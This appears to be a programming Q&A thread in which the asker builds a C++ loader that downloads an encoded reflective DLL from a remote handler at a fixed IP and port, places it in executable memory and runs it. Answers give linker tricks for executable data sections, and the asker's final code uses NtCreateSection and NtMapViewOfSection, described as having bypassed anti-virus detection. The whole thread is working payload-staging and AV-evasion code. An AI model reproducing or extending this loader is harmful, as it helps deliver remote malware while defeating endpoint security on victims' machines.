# Memory allocation issues using NTAllocateVirtualMemory and GetProcAddress not working

Tags: c++, windows, memory

I am trying to write a little program which uses NTAllocateVirtualMemory and GetProcAddress instead of VirtualAlloc.

This is what I have currently:

```
#include "pch.h"
#include "windows.h"
#include <iostream>
#include "Memoryapi.h"
#include <wininet.h>
#include <string>
#include "HTTP_Requests.h" 

using namespace std;

typedef NTSTATUS(NTAPI *NtAllocVirtualMemoryFunc) (HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);

int main()
{
    NtAllocVirtualMemoryFunc NtAllocateVirtualMemory = (NtAllocVirtualMemoryFunc)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");
    int Port = 4443;
    std::string handler = "192.168.1.137";
    std::string URI = "CMZO3LLeroANhAyGU2zSsAIz5jz5vBzoX-GgHdghJK_em-WmpzDG35R3OZlriGNbYZaXnBKQmbx51akG5L1K_ANOjpS7-l-buPeeyixDroY9K1bNb3VaaH2HOyl9S5iOg7uH7jmEwP0fot303PtTZOmIO5C92BuBB5QO_wHvKRFy6QT24kHAupIIx7BQ8VUaUoj4lLt576CKo";
    std::string UA = "Mozilla/5.0 (Windows NT 6.1; rv:11.0)";
    std::string method = "GET";
    void* payload = { 0 };
    SIZE_T size = 4194304;
    NtAllocateVirtualMemory(GetCurrentProcess(), &payload, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE | PAGE_READWRITE);
    HttpRequest(handler, URI, UA, Port, method, (char*)payload);
    ((void(*)())payload)();
}
```

It seems that after the call to NtAllocateVirtualMemory, the payload variable is not pointing to a memory allocation and is still a nullptr from what I can tell in the debugger. I did not get any errors or exceptions...

The gist behind the program is that it is supposed to retrieve a file over HTTP, place it in the allocated memory buffer and executed (it's a reflective DLL which is going to be written to the buffer). I know that the DLL file was sent by the handler to this application.

The following works, but I need to do this with NTAllocateVirtualMemory :

```
#include "pch.h"
#include "windows.h"
#include <iostream>
#include "Memoryapi.h"
#include <wininet.h>
#include <string>
#include "HTTP_Requests.h" 

using namespace std;

typedef NTSTATUS(NTAPI *NtAllocVirtualMemoryFunc) (HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);

int main()
{
    //NtAllocVirtualMemoryFunc NtAllocateVirtualMemory = (NtAllocVirtualMemoryFunc)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");
    int Port = 4443;
    std::string handler = "192.168.1.137";
    std::string URI = "yEwWxn1DIjxVi1SJC2BImQrzdFIr9qfwOB1VB75cnCFHuJQoYA7Sgwxdb";
    std::string UA = "Mozilla/5.0 (Windows NT 6.1; rv:11.0)";
    std::string method = "GET";
    //void* payload = { 0 };
    //SIZE_T size = 4194304;
    //NtAllocateVirtualMemory(GetCurrentProcess(), &payload, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE | PAGE_READWRITE);
    //HttpRequest(handler, URI, UA, Port, method, (char*)payload);
    char* buf = (char*)VirtualAlloc(0, (4 * 1024 * 1024), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    //HttpRequest(handler, URI, UA, Port, method, payload);
    HttpRequest(handler, URI, UA, Port, method, buf);
    //((void(*)())payload)();
    ((void(*)())buf)();
}
```

Comment: what's the problem with VirtualAlloc?

Comment: why you not check status returned by `NtAllocateVirtualMemory` ? if you do this - you not ask this question. you got `STATUS_INVALID_PAGE_PROTECTION` - *The specified page protection was not valid.*. because `PAGE_EXECUTE | PAGE_READWRITE` invalid combination. must be `PAGE_EXECUTE_READWRITE`. however you really need execute on page ?

Comment: and why you pass `PAGE_EXECUTE_READWRITE` to `VirtualAlloc` but `PAGE_EXECUTE | PAGE_READWRITE` to `NtAllocateVirtualMemory` ?! why you from begin try different *Protect* use ? very strange solution

Comment: @RbMm,  Oops, did not see the status :-(, thanks ! The idea is that I want the memory to be RWX because the DLL being sent back by the handler is encoded and will decode itself in memory.

Comment: @Adler, anti-virus monitors calls to VirtualAlloc and is killing my process...I am trying to use alternate memory allocation techniques to figure out how to avoid it.

Answer (score 0, accepted):

Since your actual problem is to hide from anti-virus, I would suggest to use a static buffer.

### Make data sections executable(in Visual Studio)

Specify `Project->Properties->Linker->Specify Section Attributes`.

#### For uninitialized data

uninitialized is still zero initialized

`/* global or static*/ char buf[20000];`

specify `.bss,RWE`

(which is probably what you need)

#### For initialized data

`/* global or static*/ char buf[20000]{1};`

specify `.data,RWE`

#### Both

specify `Linker->Command Line->Additional Options` as `/SECTION:.bss,RWE /SECTION:.data,RWE`

Comment: Nice, I will try it, thanks alot ! I ended up doing something very similar to what you proposed. I will post it under tis comment as a possible answer, I did bypass the AV detection :-)

Answer (score 0):

This is what I ended up doing in the end, which is very similar to what @Adler suggested above:

```
#include "pch.h"
#include "windows.h"
#include <iostream>
#include "Memoryapi.h"
#include <wininet.h>
#include <string>
#include "HTTP_Requests.h"

typedef struct _LSA_UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR  Buffer; } UNICODE_STRING, *PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef struct _CLIENT_ID { PVOID UniqueProcess; PVOID UniqueThread; } CLIENT_ID, *PCLIENT_ID;
using myNtCreateSection = NTSTATUS(NTAPI*)(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL);
using myNtMapViewOfSection = NTSTATUS(NTAPI*)(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect);

using namespace std;

int main()
{
    myNtCreateSection fNtCreateSection = (myNtCreateSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtCreateSection"));
    myNtMapViewOfSection fNtMapViewOfSection = (myNtMapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtMapViewOfSection"));
    SIZE_T size = 4194304;
    LARGE_INTEGER sectionSize = { size };
    HANDLE sectionHandle = NULL;
    PVOID localSectionAddress = NULL, remoteSectionAddress = NULL;
    fNtCreateSection(&sectionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)&sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
    fNtMapViewOfSection(sectionHandle, GetCurrentProcess(), &localSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_EXECUTE_READWRITE);
    int Port = 4443;
    std::string handler = "192.168.1.137";
    std::string URI = "yEwWxn1DIjxVi1SJC2BImQrzdFIr9qfwOB1VB75cnCFHuJQoYA7Sgwxdb";
    std::string UA = "Mozilla/5.0 (Windows NT 6.1; rv:11.0)";
    std::string method = "GET";
    HttpRequest(handler, URI, UA, Port, method, (char*)localSectionAddress);
    ((void(*)())localSectionAddress)();
}
```

It appears you cannot set RWX permissions from Windows 8.1 or above for the NtAllocateVirtualMemory function: [link](https://www.unknowncheats.me/forum/playerunknown-s-battlegrounds/245691-allocating-executable-memory-remote-process-ntallocatevirtualmemory.html)

This article seemed to suggest that it was so it misled me into trying it: [link](https://modexp.wordpress.com/2018/07/15/process-injection-sharing-payload/)